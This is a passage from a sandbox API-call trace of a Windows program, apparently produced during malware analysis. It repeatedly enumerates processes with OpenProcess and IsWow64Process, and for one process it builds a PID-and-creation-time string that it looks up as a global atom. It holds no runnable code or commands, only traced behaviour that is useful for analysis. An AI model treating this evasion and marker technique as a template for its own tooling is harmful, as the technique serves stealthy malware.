	[0116.533] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x698
	[0116.533] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.533] CloseHandle (hObject=0x698) returned 1
	[0116.533] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x698
	[0116.533] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.533] CloseHandle (hObject=0x698) returned 1
	[0116.534] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x698
	[0116.534] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.534] CloseHandle (hObject=0x698) returned 1
	[0116.534] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x698
	[0116.534] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.534] CloseHandle (hObject=0x698) returned 1
	[0116.534] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x698
	[0116.534] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.534] CloseHandle (hObject=0x698) returned 1
	[0116.534] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x698
	[0116.534] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.534] CloseHandle (hObject=0x698) returned 1
	[0116.534] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x698
	[0116.535] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.535] CloseHandle (hObject=0x698) returned 1
	[0116.535] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x698
	[0116.535] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0116.535] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0116.535] GetProcessTimes (in: hProcess=0x698, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0116.535] wsprintfA (in: param_1=0x3993150, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0116.539] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0116.539] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0116.539] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0116.539] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0116.539] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0116.540] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0116.540] CloseHandle (hObject=0x698) returned 1
	[0116.540] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0116.540] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x698
	[0116.540] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.540] CloseHandle (hObject=0x698) returned 1
	[0116.543] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x698
	[0116.543] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.543] CloseHandle (hObject=0x698) returned 1
	[0116.544] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd50) returned 0x698
	[0116.544] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.544] CloseHandle (hObject=0x698) returned 1
	[0116.577] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0116.577] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0116.577] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0116.578] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0116.578] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0116.578] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0116.578] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0116.578] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0116.578] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0116.578] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0116.579] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0116.579] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0116.579] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0116.579] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0116.579] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0116.579] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0116.580] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0116.580] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0116.580] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x698
	[0116.580] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.580] CloseHandle (hObject=0x698) returned 1
	[0116.580] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0116.580] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0116.580] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x698
	[0116.580] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.580] CloseHandle (hObject=0x698) returned 1
	[0116.580] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0116.581] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x698
	[0116.581] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.581] CloseHandle (hObject=0x698) returned 1
	[0116.581] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x698
	[0116.581] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.581] CloseHandle (hObject=0x698) returned 1
	[0116.581] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x698
	[0116.581] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.581] CloseHandle (hObject=0x698) returned 1
	[0116.581] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x698
	[0116.581] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.581] CloseHandle (hObject=0x698) returned 1
	[0116.581] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x698
	[0116.581] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.581] CloseHandle (hObject=0x698) returned 1
	[0116.582] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x698
	[0116.582] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.582] CloseHandle (hObject=0x698) returned 1
	[0116.582] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0116.582] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x698
	[0116.582] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.582] CloseHandle (hObject=0x698) returned 1
	[0116.582] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x698
	[0116.582] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.582] CloseHandle (hObject=0x698) returned 1
	[0116.583] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x698
	[0116.583] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.583] CloseHandle (hObject=0x698) returned 1
	[0116.583] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x698
	[0116.583] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.583] CloseHandle (hObject=0x698) returned 1
	[0116.583] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x698
	[0116.583] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.583] CloseHandle (hObject=0x698) returned 1
	[0116.583] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x698
	[0116.583] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.583] CloseHandle (hObject=0x698) returned 1
	[0116.583] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x698
	[0116.583] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.583] CloseHandle (hObject=0x698) returned 1
	[0116.584] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x698
	[0116.584] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.584] CloseHandle (hObject=0x698) returned 1
	[0116.584] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x698
	[0116.584] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.584] CloseHandle (hObject=0x698) returned 1
	[0116.584] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x698
	[0116.584] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.584] CloseHandle (hObject=0x698) returned 1
	[0116.584] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x698
	[0116.584] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.584] CloseHandle (hObject=0x698) returned 1
	[0116.584] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x698
	[0116.584] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.584] CloseHandle (hObject=0x698) returned 1
	[0116.585] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x698
	[0116.585] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.585] CloseHandle (hObject=0x698) returned 1
	[0116.585] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x698
	[0116.585] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.585] CloseHandle (hObject=0x698) returned 1
	[0116.585] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x698
	[0116.585] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.585] CloseHandle (hObject=0x698) returned 1
	[0116.585] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x698
	[0116.585] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.585] CloseHandle (hObject=0x698) returned 1
	[0116.585] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x698
	[0116.586] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.586] CloseHandle (hObject=0x698) returned 1
	[0116.586] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x698
	[0116.586] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.586] CloseHandle (hObject=0x698) returned 1
	[0116.586] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x698
	[0116.586] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.586] CloseHandle (hObject=0x698) returned 1
	[0116.586] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x698
	[0116.586] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.586] CloseHandle (hObject=0x698) returned 1
	[0116.587] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x698
	[0116.587] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.587] CloseHandle (hObject=0x698) returned 1
	[0116.587] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x698
	[0116.587] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.587] CloseHandle (hObject=0x698) returned 1
	[0116.587] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x698
	[0116.587] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.587] CloseHandle (hObject=0x698) returned 1
	[0116.587] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x698
	[0116.588] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0116.588] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0116.588] GetProcessTimes (in: hProcess=0x698, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0116.588] wsprintfA (in: param_1=0x3993b28, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0116.589] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0116.589] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0116.589] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0116.589] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0116.589] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0116.589] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0116.589] CloseHandle (hObject=0x698) returned 1
	[0116.589] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0116.590] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x698
	[0116.590] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.590] CloseHandle (hObject=0x698) returned 1
	[0116.590] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x698
	[0116.590] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.590] CloseHandle (hObject=0x698) returned 1
	[0116.590] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd50) returned 0x698
	[0116.590] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.590] CloseHandle (hObject=0x698) returned 1
	[0116.628] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0116.628] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0116.629] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0116.629] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0116.630] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0116.630] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0116.630] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0116.630] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0116.630] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0116.631] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0116.631] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0116.631] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0116.631] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0116.631] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0116.631] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0116.631] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0116.632] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0116.632] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0116.632] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x698
	[0116.632] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.632] CloseHandle (hObject=0x698) returned 1
	[0116.632] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0116.632] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0116.632] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x698
	[0116.632] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.632] CloseHandle (hObject=0x698) returned 1
	[0116.633] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0116.633] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x698
	[0116.633] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.633] CloseHandle (hObject=0x698) returned 1
	[0116.633] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x698
	[0116.633] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.633] CloseHandle (hObject=0x698) returned 1
	[0116.633] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x698
	[0116.633] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.633] CloseHandle (hObject=0x698) returned 1
	[0116.633] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x698
	[0116.633] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.633] CloseHandle (hObject=0x698) returned 1
	[0116.634] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x698
	[0116.634] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.634] CloseHandle (hObject=0x698) returned 1
	[0116.634] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x698
	[0116.634] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.634] CloseHandle (hObject=0x698) returned 1
	[0116.634] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0116.634] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x698
	[0116.634] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.634] CloseHandle (hObject=0x698) returned 1
	[0116.634] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x698
	[0116.634] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.634] CloseHandle (hObject=0x698) returned 1
	[0116.635] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x698
	[0116.635] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.635] CloseHandle (hObject=0x698) returned 1
	[0116.635] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x698
	[0116.635] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.635] CloseHandle (hObject=0x698) returned 1
	[0116.635] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x698
	[0116.635] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.635] CloseHandle (hObject=0x698) returned 1
	[0116.635] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x698
	[0116.635] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.635] CloseHandle (hObject=0x698) returned 1
	[0116.635] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x698
	[0116.635] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.635] CloseHandle (hObject=0x698) returned 1
	[0116.636] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x698
	[0116.636] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.636] CloseHandle (hObject=0x698) returned 1
	[0116.636] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x698
	[0116.636] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.636] CloseHandle (hObject=0x698) returned 1
	[0116.636] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x698
	[0116.636] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.636] CloseHandle (hObject=0x698) returned 1
	[0116.636] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x698
	[0116.636] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.636] CloseHandle (hObject=0x698) returned 1
	[0116.636] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x698
	[0116.637] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.637] CloseHandle (hObject=0x698) returned 1
	[0116.637] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x698
	[0116.638] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.638] CloseHandle (hObject=0x698) returned 1
	[0116.638] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x698
	[0116.638] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.638] CloseHandle (hObject=0x698) returned 1
	[0116.638] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x698
	[0116.638] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.638] CloseHandle (hObject=0x698) returned 1
	[0116.639] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x698
	[0116.639] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.639] CloseHandle (hObject=0x698) returned 1
	[0116.639] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x698
	[0116.639] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.639] CloseHandle (hObject=0x698) returned 1
	[0116.639] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x698
	[0116.639] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.639] CloseHandle (hObject=0x698) returned 1
	[0116.639] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x698
	[0116.639] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.639] CloseHandle (hObject=0x698) returned 1
	[0116.640] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x698
	[0116.640] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.640] CloseHandle (hObject=0x698) returned 1
	[0116.640] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x698
	[0116.640] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.640] CloseHandle (hObject=0x698) returned 1
	[0116.640] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x698
	[0116.640] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.640] CloseHandle (hObject=0x698) returned 1
	[0116.640] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x698
	[0116.640] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.640] CloseHandle (hObject=0x698) returned 1
	[0116.641] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x698
